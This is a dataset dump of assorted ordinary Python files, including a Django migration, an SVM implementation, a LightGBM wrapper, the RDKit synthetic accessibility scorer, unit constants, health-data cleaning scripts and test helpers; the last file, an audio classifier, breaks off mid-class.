id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
166466 | <filename>generic_links/migrations/0001_initial.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration for the generic_links app: creates the GenericLink model."""

    dependencies = [
        # contenttypes must be migrated first: GenericLink has a FK to ContentType.
        ('contenttypes', '__first__'),
        # Depend on the configured (possibly swapped) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='GenericLink',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # object_id + content_type below form the generic-relation target.
                ('object_id', models.PositiveIntegerField(db_index=True)),
                ('url', models.URLField()),
                ('title', models.CharField(max_length=200)),
                ('description', models.TextField(max_length=1000, null=True, blank=True)),
                ('created_at', models.DateTimeField(auto_now_add=True, db_index=True)),
                ('is_external', models.BooleanField(default=True, db_index=True)),
                ('content_type', models.ForeignKey(to='contenttypes.ContentType', on_delete=models.CASCADE)),
                # Optional author; the link survives user deletion (SET_NULL).
                ('user', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.SET_NULL)),
            ],
            options={
                'ordering': ('-created_at',),
                'verbose_name': 'Generic Link',
                'verbose_name_plural': 'Generic Links',
            },
        ),
    ]
| StarcoderdataPython |
3397939 | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import Normalizer
from sklearn.model_selection import cross_val_score
from imblearn.under_sampling import RandomUnderSampler
import matplotlib.pyplot as plt
"""
The code in this class was adapted from the paper "Yet More Simple SMO algorithm" by Tymchyshyn and Khavliuk
Title: simplest_smo_ever/simple_svm.ipynb
Author: Tymchyshyn and Khavliuk
Date: 25/02/21
Code Version:1
Availability: https://github.com/fbeilstein/simplest_smo_ever/blob/master/simple_svm.ipynb
"""
class SVM:
    """Support vector machine classifier trained with a simplified SMO solver.

    Adapted from "Yet More Simple SMO algorithm" by Tymchyshyn and Khavliuk,
    https://github.com/fbeilstein/simplest_smo_ever (version 1, 25/02/21).
    """

    def __init__(self, kernel='linear', C=10, max_iter=100, degree=3, gamma=1):
        """
        :param kernel: Type of kernel used to manipulate decision boundary
            (one of 'linear', 'poly', 'rbf')
        :param C: Inverse strength of L2 regularization
        :param max_iter: Number of iterations to change and update decision function
        :param degree: degree of the power (used in polynomial function)
        :param gamma: the influence of training examples by distance
            (low values far away, high values close by)
        """
        # The requested kernel is selected immediately by indexing the dict
        # literal; an unknown kernel name raises KeyError here.
        self.kernel = {'poly': lambda x, y: np.dot(x, y.T) ** degree,
                       'rbf': lambda x, y: np.exp(-gamma * np.sum((y - x[:, np.newaxis]) ** 2, axis=-1)),
                       'linear': lambda x, y: np.dot(x, y.T)}[kernel]
        self.C = C
        self.max_iter = max_iter

    def restrict_to_square(self, t, v0, u):
        """
        Restricts the step so the pair of multipliers stays inside the box
        constraint 0 <= a_i <= C.
        :param t: unclipped step size along direction u
        :param v0: current values of the two selected lambdas (idxM, idxL)
        :param u: search direction in the (idxM, idxL) plane
        :return: clipped step size
        """
        # Clip along the second coordinate first, then along the first.
        t = (np.clip(v0 + t * u, 0, self.C) - v0)[1] / u[1]
        return (np.clip(v0 + t * u, 0, self.C) - v0)[0] / u[0]

    def fit(self, X, y):
        """
        Train the classifier.
        :param X: Input variables
        :param y: output variable classification (labels expected in {0, 1})
        """
        self.X = X.copy()
        # converts values of y to -1,1 as is the convention in SVM
        self.y = y * 2 - 1
        # initializes lagrangian multipliers to 0
        self.lambdas = np.zeros_like(self.y, dtype=float)
        # precomputed objective-function matrix K_ij = y_i y_j k(x_i, x_j)
        self.K = self.kernel(self.X, self.X) * self.y[:, np.newaxis] * self.y
        # outer loop: number of SMO passes set in the constructor
        for _ in range(self.max_iter):
            # inner loop over every lagrangian multiplier
            for idxM in range(len(self.lambdas)):
                # second multiplier: a random choice among all multipliers
                idxL = np.random.randint(0, len(self.lambdas))
                # 2x2 submatrix of K for the selected pair
                Q = self.K[[[idxM, idxM], [idxL, idxL]], [[idxM, idxL], [idxM, idxL]]]
                # current values of the selected pair of lambdas
                v0 = self.lambdas[[idxM, idxL]]
                # gradient components of the dual objective for the pair
                k0 = 1 - np.sum(self.lambdas * self.K[[idxM, idxL]], axis=1)
                # update direction that keeps the equality constraint satisfied
                u = np.array([-self.y[idxL], self.y[idxM]])
                # optimal (unclipped) step; 1E-15 guards against division by zero
                t_max = np.dot(k0, u) / (np.dot(np.dot(Q, u), u) + 1E-15)
                # apply the step after restricting it to the [0, C] box
                self.lambdas[[idxM, idxL]] = v0 + u * self.restrict_to_square(t_max, v0, u)
        # indexes of support vectors (non-negligible multipliers)
        idx, = np.nonzero(self.lambdas > 1E-15)
        # bias: mean error over the support vectors
        self.b = np.mean((1.0 - np.sum(self.K[idx] * self.lambdas, axis=1)) * self.y[idx])

    def decision_function(self, X):
        """
        :param X: X input values
        :return: decision function, boundary for classification
        """
        return np.sum(self.kernel(X, self.X) * self.y * self.lambdas, axis=1) + self.b

    def predict(self, X):
        # Maps sign {-1, +1} of the decision function onto class labels {0, 1}.
        return (np.sign(self.decision_function(X)) + 1) // 2
def accuracy(y_true, y_pred):
    """Return the fraction of positions where y_true and y_pred agree.

    Inputs are converted with np.asarray so plain Python lists work too
    (a list == list comparison would otherwise yield a single bool).
    """
    y_true = np.asarray(y_true)
    y_pred = np.asarray(y_pred)
    return np.mean(y_true == y_pred)
def main():
    """Load final_data.csv, balance classes, train the SVM, print test accuracy."""
    # data preprocessing including standardization, data split, balancing classes
    data = pd.read_csv("final_data.csv", index_col=[0])
    data = data.to_numpy()# save memory
    # NOTE(review): float16 halves memory but loses precision — confirm acceptable.
    data = np.float16(data)
    X = data[:, :-1]
    Y = data[:, -1:]
    # Balance classes by undersampling the majority class.
    rus = RandomUnderSampler()
    X, y = rus.fit_resample(X, Y)
    X_train, X_test, y_train, y_test = train_test_split(StandardScaler().fit_transform(X), y, test_size=0.2)
    # creating model, fit and predicting values, printing accuracy
    clf = SVM(C=10,kernel= 'rbf', max_iter = 100, gamma= 0.01)
    clf.fit(X_train, y_train)
    y_pred = clf.predict(X_test)
    # Map any -1 back to 0 (predict already returns {0, 1}, so this is a safeguard).
    y_pred_true = [0 if y == -1 else y for y in y_pred]
    print(accuracy(y_test,y_pred_true))


if __name__=='__main__':
    main()
| StarcoderdataPython |
4916746 | <reponame>khan9797/parser
from scapy.all import Packet, raw
from scapy.layers.inet import IP, Ether, TCP, UDP
from scapy.layers.l2 import Dot1Q
from scapy.layers.sctp import SCTP
# Dummy 640-byte payload and protocol headers for assembling test packets
# with scapy. Presumably used by a parser test harness — verify against caller.
payload = '0' * 640
ether_hdr = Ether(src='00:34:56:78:9a:bc',dst='00:45:67:89:ab:cd')
ip_hdr = IP(version=0x04,ihl=0x5,tos=0x0,id=0x0001,flags=0x0000,ttl=0x64,src='10.60.0.1',dst='10.60.1.1')
# Alternative transport-layer headers sharing the same port pair.
tcp_hdr = TCP(sport=4250, dport=4300)
udp_hdr = UDP(sport=4250, dport=4300)
sctp_hdr = SCTP(sport=4250, dport=4300)
# 802.1Q VLAN tag with VLAN id 5.
vlan_header = Dot1Q(vlan=5)
6600552 | # Python script for rewriting a docker env file.
# usage: patch_env dockerenv_input.env dockerenv_output.env
# Copies each input line to the output, except when it is of the form
# VAR_X=value
# and an environment variable PATCH_VAR_X exists: then its value is used.
# Performs no error handling.
import os
import re
import sys
# Environment variables with this prefix override same-named file variables.
PATCHVAR_PREFIX = "PATCH_"


def patch_file(infile: str, outfile: str) -> None:
    """Copy *infile* to *outfile* line by line, patching assignment lines.

    Each line is passed through `patched`, which substitutes the value of a
    PATCH_<VAR> environment variable when one exists. The output is written
    in binary mode with explicit UTF-8 encoding so line endings and encoding
    are stable across platforms.
    """
    # Renamed handles: `input`/`output` shadowed the builtins of the same name.
    with open(infile, 'rt', encoding='utf-8') as src, \
            open(outfile, 'wb') as dst:
        for line in src:
            dst.write(patched(line).encode('utf-8'))
def patched(line: str, prefix: str = "PATCH_") -> str:
    """Return *line*, patched when it is an assignment with an env override.

    A line of the form ``VAR_X=value`` is rewritten to use the value of the
    environment variable ``<prefix>VAR_X`` when that variable exists.
    All other lines (and assignments without an override) pass through
    unchanged. *prefix* defaults to the module-wide "PATCH_" convention.
    """
    var_match = re.match(r"^(\w+)\s*=", line)
    if not var_match:
        return line  # non-assignment line
    varname = var_match.group(1)
    patchvalue = os.environ.get(prefix + varname)
    if patchvalue is None:
        return line  # assignment line, but no override set
    return "%s=%s\n" % (varname, patchvalue)  # patched assignment line
if __name__ == '__main__':
    # call: python patch_env.py in out
    # If argv[1] is a .py file name, the real file arguments start at index 2
    # (handles invocations where the script path itself appears in argv[1:]).
    first = 2 if sys.argv[1].endswith('.py') else 1
    patch_file(sys.argv[first], sys.argv[first + 1])
| StarcoderdataPython |
11307338 | import os
import unittest
from kontur import FocusClient
class TestKonturFocus(unittest.TestCase):
    """Integration tests for FocusClient against the live Kontur Focus API.

    Requires the FOCUS_API_KEY environment variable to be set.
    """

    def setUp(self):
        # Fail fast when no API key is configured.
        api_key = os.getenv('FOCUS_API_KEY', None)
        if api_key is None:
            raise Exception('Set FOCUS_API_KEY env varible')
        self.client = FocusClient(api_key)

    def test_req(self):
        """Look up a known INN and validate the response structure."""
        inn = '6663003127'
        org_list = self.client.req(inn=inn)
        # A single-INN query should return a list with exactly one org dict.
        self.assertIsInstance(org_list, list, org_list)
        self.assertEqual(1, len(org_list), org_list)
        org = org_list[0]
        self.assertIsInstance(org, dict, org)
        self.assertIn('inn', org, org)
        self.assertEqual(inn, org['inn'], org)
        self.assertIn('ogrn', org, org)
        ogrn = org['ogrn']
        # 'UL' holds the legal-entity details, including the short legal name.
        self.assertIn('UL', org, org)
        ul = org['UL']
        self.assertIn('legalName', ul, ul)
        self.assertIn('short', ul['legalName'], ul)
        self.assertGreater(len(ul['heads']), 0, ul)
| StarcoderdataPython |
40253 | """
Tool for 'leave-one-out' testing features in dataset.
Adds use_column parameter for lightgbm CLI, which works
like an opposite one to ignore_columns.
Example usage
--------------
>>> python lgbm_tool.py --use_column=column1,column2,column3 \
>>> config=path_to_config data=path_to_data valid=path_to_valid
"""
import argparse
import subprocess
from typing import List, TextIO
def _get_all_features(data_file: TextIO) -> List[str]:
features = data_file.readline().strip().split(',')
return features
def _generate_ignore_string(features: List[str],
features_left: List[str]) -> str:
for feature in features_left:
features.remove(feature)
ignore_string = 'name:' + ','.join([f"{feature}" for feature in features])
return ignore_string
def _parse_lgbm_config(config_file: str) -> dict:
config = {}
f = open(config_file, 'r')
for line in f:
line = line.strip()
if line.startswith('#'):
continue
parameter_name, parameter_value = line.split('=')
config[parameter_name] = parameter_value
f.close()
return config
def _get_label_column(lightgbm_cli_args: dict):
"""Checks whether label column is either in CLI arguments or lgbm config
file and gets it. If not, raises an exception.
"""
if 'label_column' in lightgbm_cli_args:
label_column = lightgbm_cli_args['label_column'].replace('name:', '')
return label_column
config = lightgbm_cli_args.get('config')
if not config:
raise ValueError('No label column provided')
lightgbm_config_args = _parse_lgbm_config(config)
if 'label_column' not in lightgbm_config_args:
raise ValueError('No label column provided')
label_column = lightgbm_config_args['label_column'].replace('name:', '')
return label_column
def run_lgbm(args: dict) -> None:
    """Run the lightgbm CLI, translating --use_column into ignore_column.

    NOTE(review): despite the original docstring saying "asynchronously",
    subprocess.call blocks until lightgbm exits.
    """
    # Parse pass-through "key=value" CLI arguments into a dict.
    lightgbm_args = {
        key: value for key, value in
        map(lambda x: x.split('='), args['lightgbm_args'])
    }
    label_column = _get_label_column(lightgbm_args)
    # The data file's header line supplies the full feature list.
    with open(lightgbm_args['data'], 'r') as f:
        features = _get_all_features(f)
    use_columns = args['use_column'].split(',')
    use_columns.append(label_column)  # never ignore the label column itself
    ignore_string = _generate_ignore_string(features, use_columns)
    subprocess.call(
        [
            'lightgbm',
            f'ignore_column={ignore_string}',
            *args['lightgbm_args']
        ],
    )
def main():
    """Parse CLI arguments and hand them to run_lgbm."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--use_column', type=str, required=False,
        help='Features to use for training'
    )
    # Everything else is forwarded verbatim to the lightgbm CLI.
    parser.add_argument(
        'lightgbm_args', nargs='+',
        help='Any arguments for lightgbm cli'
    )
    args = parser.parse_args()
    run_lgbm(vars(args))


if __name__ == '__main__':
    main()
| StarcoderdataPython |
322709 | #
# calculation of synthetic accessibility score as described in:
#
# Estimation of Synthetic Accessibility Score of Drug-like Molecules based on Molecular Complexity and Fragment Contributions
# <NAME> and <NAME>
# Journal of Cheminformatics 1:8 (2009)
# http://www.jcheminf.com/content/1/1/8
#
# several small modifications to the original paper are included
# particularly slightly different formula for marocyclic penalty
# and taking into account also molecule symmetry (fingerprint density)
#
# for a set of 10k diverse molecules the agreement between the original method
# as implemented in PipelinePilot and this implementation is r2 = 0.97
#
# <NAME> & <NAME>, september 2013
#
from __future__ import print_function
from rdkit import Chem
from rdkit.Chem import rdMolDescriptors
# from rdkit.six.moves import cPickle
import pickle
from rdkit.six import iteritems
import math
from collections import defaultdict
import os.path as op
_fscores = None
def readFragmentScores(name='fpscores'):
    """Load fragment contribution scores into the module-global `_fscores`.

    The gzipped pickle at ``<name>.pkl.gz`` holds rows of the form
    ``[score, bitId, bitId, ...]``; these are flattened to a
    ``{bitId: score}`` dict. When *name* is the default "fpscores" the file
    is resolved next to this module.

    The mapping is also returned (the original returned None, so this is a
    backward-compatible addition); the gzip handle is now closed via `with`.
    """
    import gzip
    global _fscores
    # generate the full path filename:
    if name == "fpscores":
        name = op.join(op.dirname(__file__), name)
    with gzip.open('%s.pkl.gz' % name) as fp:
        raw_scores = pickle.load(fp)
    outDict = {}
    for i in raw_scores:
        for j in range(1, len(i)):
            outDict[i[j]] = float(i[0])
    _fscores = outDict
    return outDict
def numBridgeheadsAndSpiro(mol, ri=None):
    """Return (nBridgehead, nSpiro) atom counts for *mol*.

    ``ri`` (ring info) is accepted for signature compatibility but unused.
    """
    nSpiro = rdMolDescriptors.CalcNumSpiroAtoms(mol)
    nBridgehead = rdMolDescriptors.CalcNumBridgeheadAtoms(mol)
    return nBridgehead, nSpiro
def calculateScore(m):
    """Compute the synthetic accessibility (SA) score of an RDKit molecule.

    Returns a float in [1, 10] (1 = easy to synthesize, 10 = very hard).
    Combines a fragment-contribution score with complexity penalties
    (size, stereo centers, spiro atoms, bridgeheads, macrocycles) and a
    symmetry correction based on fingerprint density.
    """
    if _fscores is None:
        readFragmentScores()

    # fragment score
    fp = rdMolDescriptors.GetMorganFingerprint(m,
                                               2)  # <- 2 is the *radius* of the circular fingerprint
    fps = fp.GetNonzeroElements()
    score1 = 0.
    nf = 0
    # dict.items() replaces rdkit.six.iteritems (Python 3 native).
    for bitId, v in fps.items():
        nf += v
        sfp = bitId
        score1 += _fscores.get(sfp, -4) * v  # unknown fragments contribute -4
    score1 /= nf

    # features score
    nAtoms = m.GetNumAtoms()
    nChiralCenters = len(Chem.FindMolChiralCenters(m, includeUnassigned=True))
    ri = m.GetRingInfo()
    nBridgeheads, nSpiro = numBridgeheadsAndSpiro(m, ri)
    nMacrocycles = 0
    for x in ri.AtomRings():
        if len(x) > 8:
            nMacrocycles += 1

    sizePenalty = nAtoms**1.005 - nAtoms
    stereoPenalty = math.log10(nChiralCenters + 1)
    spiroPenalty = math.log10(nSpiro + 1)
    bridgePenalty = math.log10(nBridgeheads + 1)
    macrocyclePenalty = 0.
    # ---------------------------------------
    # This differs from the paper, which defines:
    #   macrocyclePenalty = math.log10(nMacrocycles+1)
    # This form generates better results when 2 or more macrocycles are present
    if nMacrocycles > 0:
        macrocyclePenalty = math.log10(2)

    score2 = 0. - sizePenalty - stereoPenalty - spiroPenalty - bridgePenalty - macrocyclePenalty

    # correction for the fingerprint density
    # not in the original publication, added in version 1.1
    # to make highly symmetrical molecules easier to synthetise
    score3 = 0.
    if nAtoms > len(fps):
        score3 = math.log(float(nAtoms) / len(fps)) * .5

    sascore = score1 + score2 + score3

    # transform "raw" value onto a 1..10 scale
    # (renamed from `min`/`max` to avoid shadowing the builtins)
    raw_min = -4.0
    raw_max = 2.5
    sascore = 11. - (sascore - raw_min + 1) / (raw_max - raw_min) * 9.
    # smooth the 10-end
    if sascore > 8.:
        sascore = 8. + math.log(sascore + 1. - 9.)
    if sascore > 10.:
        sascore = 10.0
    elif sascore < 1.:
        sascore = 1.0

    return sascore
def processMols(mols):
    """Print a tab-separated table of SMILES, molecule name, and SA score."""
    print('smiles\tName\tsa_score')
    for i, m in enumerate(mols):
        if m is None:
            continue  # skip molecules that failed to parse
        s = calculateScore(m)
        smiles = Chem.MolToSmiles(m)
        print(smiles + "\t" + m.GetProp('_Name') + "\t%3f" % s)
if __name__ == '__main__':
    import sys, time

    t1 = time.time()
    readFragmentScores("fpscores")
    t2 = time.time()
    suppl = Chem.SmilesMolSupplier(sys.argv[1])
    t3 = time.time()
    processMols(suppl)
    t4 = time.time()
    # Timing summary goes to stderr so stdout remains a clean TSV table.
    print('Reading took %.2f seconds. Calculating took %.2f seconds' % ((t2 - t1), (t4 - t3)),
          file=sys.stderr)
#
# Copyright (c) 2013, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
| StarcoderdataPython |
6419637 | <filename>notes/eos/units.py
##################################################
#Physical conversion factors
#Particle Data Group (Review of particle Physics 2015) values
# in SI units
#c = 2.99792458e8 #speed of light
#h = 6.62607004081e-34 #Planck constant
#G = 6.6730831e-11 #gravitational constant
# SI-valued helpers (suffix SI); everything below without suffix is CGS.
eVSI = 1.602176620898e-19  # electron volt in Joule
pcSI = 3.08567758149e16  # parsec in m
RsSI = 2.9532500772e3  # Schwarzschild radius of Sun in m
Rs = 2.9532500772  # Schwarzschild radius of Sun in km (comment fixed: value is RsSI/1e3)
c = 2.99792458e10  # speed of light [cm/s]
G = 6.6730831e-8  # gravitational constant [cm^3 g^-1 s^-2]
me = 9.1093897e-28  # electron mass [g]
mp = 1.6726231e-24  # proton mass [g]
mn = 1.6749286e-24  # neutron mass [g]
kB = 1.380658e-16  # Boltzmann constant [erg/K]
hP = 6.6260755e-27  # Planck constant [erg s]
hbar = 1.05457266e-27  # reduced Planck constant [erg s]
eC = 4.8032068e-10  # elementary charge [esu]
mH = 1.6733e-24  # hydrogen atom mass [g]
eV = 1.602177e-12  # electron volt [erg]
pc = 3.08567758149e18  # parsec [cm]
# plasma electron relativity temperature
Tr = me*c**2/kB
# neutron plasma relativity temperature
Tn = mn*c**2/kB
# electron Compton wavelength
lambdaC = hbar/me/c
# plasma reference pressure
Pr = me * c**2 / lambdaC**3
# neutron Compton wavelength
lambdaCn = hbar/mn/c
# Neutron reference pressure
Prn = mn * c**2 / lambdaCn**3
# Other conversion factors
kelvin_per_keV = 1.16045e7
erg_per_kev = 1.0e-10 / eVSI
GeVfm_per_dynecm = 1.e9 * eV / (1.0e-13)**3
##################################################
# Operate in units where G = c = 1.
# Use units of solar masses
##################################################
# (G Msun /c^2 )^-1
solar_mass_per_km = 2.0e3/Rs
# (G Msun/c^3)^-1
# NOTE(review): this mixes c in cm/s with Rs in km — confirm intended units.
solar_mass_per_s = 2.0*c/Rs
##################################################
# other conversion factors
km_per_kpc = pcSI  # numerically, m per pc equals km per kpc
cm_per_tenkpc = 1.0e-6 / pcSI
# Blackbody constant
# hzkeV^4 * 2*h/c^2
#constbb = 1.0e15 * (eV/hP)**4 * 2.0*hP/c**2
# other constants
##################################################
# mass of sun [g]
Msun = 1.988435e33
#kg_per_Msun = 1.988435e30
| StarcoderdataPython |
1882256 | <gh_stars>0
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from india_nhm.districts.base.data_cleaner import NHMDataLoaderBase
from india_nhm.districts.base.readme_generator import ReadMeGen
# Mapping dictionary from raw NHM data column headers to DataCommons StatVars.
cols_to_nodes = {
    'District': 'District',
    'DistrictCode': 'lgdCode',
    'Date': 'Date',
    'Total number of pregnant women Registered for ANC': 'Count_PregnantWomen_RegisteredForAntenatalCare',
    'Number of Pregnant women registered within first trimester': 'Count_PregnantWomen_RegisteredForAntenatalCareWithinFirstTrimester',
    'Total reported deliveries': 'Count_ChildDeliveryEvent',
    'Institutional deliveries (Public Insts.+Pvt. Insts.)': 'Count_ChildDeliveryEvent_InAnInstitution',
    'Deliveries Conducted at Public Institutions': 'Count_ChildDeliveryEvent_InPublicInstitution',
    'Number of Home deliveries': 'Count_ChildDeliveryEvent_AtHome',
    'Number of home deliveries attended by SBA trained (Doctor/Nurse/ANM)': 'Count_ChildDeliveryEvent_AtHome_WithStandByAssist',
    '% Safe deliveries to Total Reported Deliveries': 'Count_DeliveryEvent_Safe_AsFractionOf_Count_DeliveryEvent'
}

# Human-readable descriptions of the same columns (used for the README).
clean_names = {
    'District': 'District',
    'DistrictCode': 'lgdCode',
    'Date': 'Date',
    'Total number of pregnant women Registered for ANC': 'Total number of pregnant women registered for Antenatal Care',
    'Number of Pregnant women registered within first trimester': 'Number of pregnant women registered for Antenatal Care within first trimester',
    'Total reported deliveries': 'Total reported child deliveries',
    'Institutional deliveries (Public Insts.+Pvt. Insts.)': 'Institutional deliveries (includes public and private institutions)',
    'Deliveries Conducted at Public Institutions': 'Deliveries conducted at public institutions',
    'Number of Home deliveries': 'Number of home deliveries',
    'Number of home deliveries attended by SBA trained (Doctor/Nurse/ANM)': 'Number of home deliveries attended by StandBy Assist (Doctor/Nurse/ANM)',
    '% Safe deliveries to Total Reported Deliveries': 'Percentage of safe deliveries to total reported deliveries'
}

if __name__ == '__main__':
    dataset_name = "NHM_MaternalHealth"
    # Preprocess files; Generate CSV; Generate TMCF file
    loader = NHMDataLoaderBase(data_folder='../data/',
                               dataset_name=dataset_name,
                               cols_dict=cols_to_nodes,
                               clean_names=clean_names,
                               final_csv_path="{}.csv".format(dataset_name))
    loader.generate_csv()
    loader.create_mcf_tmcf()
    # Write README file
    readme_gen = ReadMeGen(dataset_name=dataset_name,
                           dataset_description="Maternal Health Data",
                           data_level="District level",
                           cols_dict=cols_to_nodes,
                           clean_names=clean_names)
    readme_gen.gen_readme()
| StarcoderdataPython |
class Solution:
    """Length of the longest substring without repeating characters (LeetCode 3)."""

    def lengthOfLongestSubstringV1(self, s: str) -> int:
        """Sliding window backed by a fixed 128-slot ASCII table.

        Assumes all characters are ASCII (ord(c) < 128); for arbitrary text
        use V2, which stores positions in a dict instead.
        """
        char_map = [None] * 128
        start, ans = -1, 0
        for i, c in enumerate(s):
            code = ord(c)
            # `is not None` instead of `!= None` (identity check for the sentinel).
            if char_map[code] is not None:
                # Move the window start past the previous occurrence of c.
                start = max(start, char_map[code])
            char_map[code] = i
            ans = max(ans, i - start)
        return ans

    def lengthOfLongestSubstringV2(self, s: str) -> int:
        """Same sliding window, using a dict so any character set works."""
        char_map, start, ans = {}, -1, 0
        for i, c in enumerate(s):
            if c in char_map:
                start = max(start, char_map[c])
            char_map[c] = i
            ans = max(ans, i - start)
        return ans
# TEST
# Known examples from LeetCode problem 3. Note only V2 is exercised here;
# V1 is left untested by this loop.
for s, expected in [
    ["", 0],
    ["abcabcbb", 3],
    ["bbbbb", 1],
    ["pwwkew", 3],
    ["c", 1],
    ["abba", 2],
]:
    sol = Solution()
    actual = sol.lengthOfLongestSubstringV2(s)
    print("Length of longest substring of", s, "->", actual)
    assert actual == expected
| StarcoderdataPython |
8095850 | <reponame>Ganyuhao/executor
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
单元测试基类
"""
import os
import tempfile
import unittest
from executor.common.config import Manage
import yaml
def get_config_item(item, default, type_c):
    """Read a config item from the environment with fallback to *default*.

    The environment variable checked is ``FUCKER_EXECUTOR_<ITEM>`` where
    <ITEM> is *item* upper-cased with '-' replaced by '_'. The value is
    coerced with *type_c*; a falsy *type_c* returns the value as str, and
    bool values are parsed from the (case-insensitive) string "true".
    """
    upper_item = str(item).upper().replace("-", "_")
    env_var = os.getenv("FUCKER_EXECUTOR_%s" % upper_item)
    # Empty-string env values fall back to the default, matching original behavior.
    var = env_var if env_var else default
    if not type_c:
        return str(var)
    if type_c is bool:
        return str(var).lower() == "true"
    return type_c(var)
class TestCase(unittest.TestCase):
    """Unit-test base class: seeds executor config and loads YAML fixtures.

    Subclasses set ``data_file_path`` to a YAML file under ./datas to have
    it loaded into ``_test_dataset`` during setUpClass.
    """

    # Defaults, each overridable via a FUCKER_EXECUTOR_<NAME> env variable.
    config_items = {
        "host": get_config_item("host", "0.0.0.0", str),
        "port": get_config_item("port", "50001", int),
        "database_port": get_config_item("database_port", 3306, int),
        "debug": get_config_item("debug", True, bool),
        # NOTE(review): tempfile.mktemp() is deprecated and race-prone — consider
        # NamedTemporaryFile/mkstemp; kept as-is here.
        "log_file": get_config_item("log_file", tempfile.mktemp(), str),
        "database_username": get_config_item("database_username", "root", str),
        "database_host": get_config_item("database_host", "127.0.0.1", str),
        "database_password": get_config_item("database_password", "<PASSWORD>", str),
    }
    # Optional YAML fixture path (relative to the ./datas directory).
    data_file_path = None
    _test_dataset = {}

    @classmethod
    def setUpClass(cls):
        # Push the config into Manage, then keep a fresh handle on it.
        conf = Manage(**cls.config_items)
        conf.update_config_items(**cls.config_items)
        cls.conf = Manage()
        if cls.data_file_path:
            data_file_path = os.path.join(
                os.path.dirname(os.path.abspath(__file__)),
                "datas",
                cls.data_file_path)
            with open(data_file_path, "rb") as yaml_fp:
                cls._test_dataset = yaml.safe_load(yaml_fp)

    def get_test_date(self, *args):
        """Walk the loaded fixture along *args* keys; missing keys yield {}."""
        td = self._test_dataset.get(args[0], {})
        for path in args[1:]:
            td = td.get(path, {})
        return td
| StarcoderdataPython |
3282968 | <reponame>shawncal/ELL
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: classifier.py
# Authors: <NAME>
#
# Requires: Python 3.x
#
###################################################################################################
import os
import time
import numpy as np
class AudioClassifier:
    """
    This class wraps an ELL audio classifier model and adds some nice features, like mapping the
    predictions to a string label, any category starting with "_" will be classified as null. It also
    does some optional posterior smoothing on the predictions since audio model outputs
    tend to be rather noisy. It also supports a threshold value so any prediction less than this
    probability is ignored.
    """

    def __init__(self, model_path, categories_file, threshold=0, smoothing_window=0, ignore_list=[]):
        """
        Initialize the new AudioClassifier.
        model_path - the path to the ELL model to load; a '.ell' extension selects the
            interpreted compute model, anything else the compiled model.
        categories_file - the path to a text file containing strings labels for each prediction
        threshold - threshold for predictions, (default 0).
        smoothing_window - controls the size of the smoothing window (defaults to 0).
        ignore_list - list of category labels to ignore (like 'background' or 'silence');
            may also be a comma-separated string or None.
        NOTE(review): mutable default for ignore_list — safe only because it is
        never mutated below; consider None as the default.
        """
        self.smoothing_window = None
        if smoothing_window is not None:
            self.smoothing_window = float(smoothing_window)
        self.threshold = threshold
        self.categories = None
        # Normalize ignore_list into a plain list of label strings.
        if isinstance(ignore_list, str):
            self.ignore_list = [x.strip() for x in ignore_list.split(',')]
        elif isinstance(ignore_list, list):
            self.ignore_list = ignore_list
        elif ignore_list is None:
            self.ignore_list = []
        else:
            raise Exception("Expecting ignore list to be a comma separated list or a python list of strings")
        if categories_file:
            with open(categories_file, "r") as fp:
                self.categories = [e.strip() for e in fp.readlines()]
        self.using_map = False
        # '.ell' files run through the interpreted compute model; otherwise load compiled.
        if os.path.splitext(model_path)[1] == ".ell":
            import compute_ell_model as ell
            self.model = ell.ComputeModel(model_path)
            self.using_map = True
        else:
            import compiled_ell_model as ell
            self.model = ell.CompiledModel(model_path)
        self.logfile = None
        # Cache input/output shapes and sizes from the model.
        ts = self.model.input_shape
        self.input_shape = (ts.rows, ts.columns, ts.channels)
        ts = self.model.output_shape
        self.output_shape = (ts.rows, ts.columns, ts.channels)
